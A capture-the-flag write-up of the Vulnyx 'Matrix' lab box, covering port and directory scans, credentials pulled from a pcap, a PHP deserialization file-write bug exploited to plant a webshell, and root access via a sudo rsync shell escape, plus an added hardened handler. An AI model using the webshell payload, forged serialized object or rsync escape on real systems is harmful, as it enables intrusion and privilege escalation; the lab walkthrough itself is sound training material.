vulnyx-Matrix

A medium-difficulty Linux machine from the Vulnyx range.

Information gathering

Port scan

┌──(root㉿kali)-[/tmp]
└─# nmap -Pn -n -p- 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-25 22:56 EDT
Nmap scan report for 192.168.56.103
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:EA:04:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 20.37 seconds
┌──(root㉿kali)-[/tmp]
└─# nmap -Pn -n -sCV -p22,80 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-25 22:58 EDT
Nmap scan report for 192.168.56.103
Host is up (0.0012s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 67:78:c9:d2:e3:ff:be:fc:9e:13:9a:af:9d:59:17:66 (ECDSA)
|_ 256 1a:78:b1:e6:f1:f0:d1:b3:ab:c8:3f:95:fd:46:52:67 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Enter The Matrix
MAC Address: 08:00:27:EA:04:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.39 seconds

Vulnerability discovery

Web (port 80)

Choosing RED PILL

redirects to a PDF page.

Choosing BLUE PILL

redirects to Google.

There is, however, a hint in the page source:

fuzz for .pcap files?

Directory scan

┌──(root㉿kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://192.168.56.103" --no-error -t 100 -x .pcap
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: pcap
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/trinity.pcap (Status: 200) [Size: 146389]

trinity.pcap

The capture contains a lot of information.

Several user credentials can be recovered from it:

MAND: rsync --daemon /home/smith/file.txt 192.168.2.100:/backup/smith/
PASSWORD: kT8020e136Z2YLJa2fEZ

MAND: rsync --daemon /home/john/file.txt 192.168.2.100:/backup/john/
PASSWORD: krGVRU2vCedfwjVZXDrp

MAND: rsync --daemon /home/alice/file.txt 192.168.2.100:/backup/alice/
PASSWORD: BgUvmyV0OEgEDpMjpJUv

MAND: rsync --daemon /home/neo/file.txt 192.168.2.100:/backup/neo/
PASSWORD: 2LmQA1WT2Xc4avgGA1yY

The capture also carries a webp image; export it as a file.

The HTTP traffic contains only a single response. Following that stream reveals a hint:

there is a subdomain, M47r1X.matrix.nyx.

Add it to /etc/hosts and visit it.

Then run a directory scan against the subdomain.

Subdomain directory scan

┌──(root㉿kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://M47r1X.matrix.nyx/" --no-error -t 100 -x txt,php,zip,bak,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://M47r1X.matrix.nyx/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,zip,bak,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 3440]
/.php (Status: 403) [Size: 282]
/.html (Status: 403) [Size: 282]
/messages.txt (Status: 200) [Size: 1]
/.html (Status: 403) [Size: 282]
/.php (Status: 403) [Size: 282]

messages.txt

I tried submitting an id on the page.

Hmm, it is still a random one.

PHP deserialization

filtrate-backend-matrix.php.txt

<?php

class Message
{
    public $file = "messages.txt";
    public $message = "";

    // Runs automatically when unserialize() rebuilds a Message object.
    // Both the target path and the content come straight from the
    // serialized data, so a crafted object writes an attacker-chosen
    // string to an attacker-chosen file.
    public function __unserialize(array $data): void
    {
        $file = $data['file'] ?? $this->file;
        $this->message = $data['message'];
        file_put_contents($file, $data['message'] . "\n", FILE_APPEND);
    }
}


__unserialize() is invoked whenever the object is deserialized, and inside it the file write uses a path taken from the serialized data, so this is an arbitrary file write. To exploit it we need control over both file and message.

In the request, the data we submit is serialized and URL-encoded automatically.

The serialization is done by a function in the front-end JavaScript.

So we can forge the serialized data ourselves and write a webshell.

<?php

// Local copy of the backend class, used only so serialize() emits the
// same class name and property layout the server expects.
class Message {
    public $file = "messages.txt";
    public $message = "";
    public function __unserialize(array $data){
        file_put_contents($data['file'], $data['message'] . "\n", FILE_APPEND);
    }
}

$msg = new Message();
$msg->file = '1.phar';                           // path the server will write to
$msg->message = "<?php system(\$_GET[1]);?>";    // content appended to that file

echo serialize($msg);


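As an added example (not the box's code and not the author's), here is a hardened form of the same message-append handler: the request body is decoded as JSON instead of being passed to unserialize(), only the message field is accepted, and the output path is fixed on the server, so a client-supplied file key has no effect. The function name appendMessage, the JSON shape and the sample bodies are assumptions.

```php
<?php
// Added example, not part of the original box or write-up.
// Hardened replacement for the vulnerable Message::__unserialize() pattern.

const MESSAGE_FILE = 'messages.txt';   // fixed server-side name, never taken from the client
const MAX_MESSAGE_LEN = 512;

/**
 * Append one message to MESSAGE_FILE inside $dir.
 * Returns true on success, false when the input is rejected.
 */
function appendMessage(string $body, string $dir): bool
{
    // JSON, not unserialize(): no object instantiation, no magic methods.
    $data = json_decode($body, true);
    if (!is_array($data) || !isset($data['message']) || !is_string($data['message'])) {
        return false;                                   // malformed body or wrong type
    }
    // Only 'message' is read; any other key (such as 'file') is ignored.
    $msg = $data['message'];
    if ($msg === '' || strlen($msg) > MAX_MESSAGE_LEN) {
        return false;                                   // enforce a length bound
    }
    if (!preg_match('/^[\x20-\x7E]+\z/', $msg)) {
        return false;                                   // printable ASCII only, no newlines
    }
    $path = rtrim($dir, '/') . '/' . MESSAGE_FILE;      // path chosen by the server
    return file_put_contents($path, $msg . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// Constructed request bodies for demonstration (assumed, not captured).
$legit      = json_encode(['message' => 'hello from neo']);
$extraKey   = json_encode(['file' => 'x.phar', 'message' => 'extra key carries no weight']);
$serialized = 'O:7:"Message":1:{s:4:"file";s:6:"x.phar";}';   // serialize() format, not JSON

$dir = sys_get_temp_dir();
var_dump(appendMessage($legit, $dir));       // plain message
var_dump(appendMessage($extraKey, $dir));    // 'file' key is dropped, same target file
var_dump(appendMessage($serialized, $dir));  // not JSON, never reaches file_put_contents
```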


That gives us a shell; next, spawn a reverse shell.

Privilege escalation

Password leak in the pcap

From the capture we already have passwords for several users, and /etc/passwd shows that the smith user exists on the box.

sudo -l shows that rsync can be run with sudo.

sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

# id
uid=0(root) gid=0(root) grupos=0(root)
# bash
root@matrix:/var/www/html# cat /root/root.txt
5f3cae74fbcf1919ccxxxxx
root@matrix:/var/www/html# cat /home/smith/user.txt
13fd11421e33199c202xxxxx
root@matrix:/var/www/html#

Source: https://r3bir7hcx.github.io/2025/04/26/vulnyx-Matrix/
Author: CXCX
Posted on April 26, 2025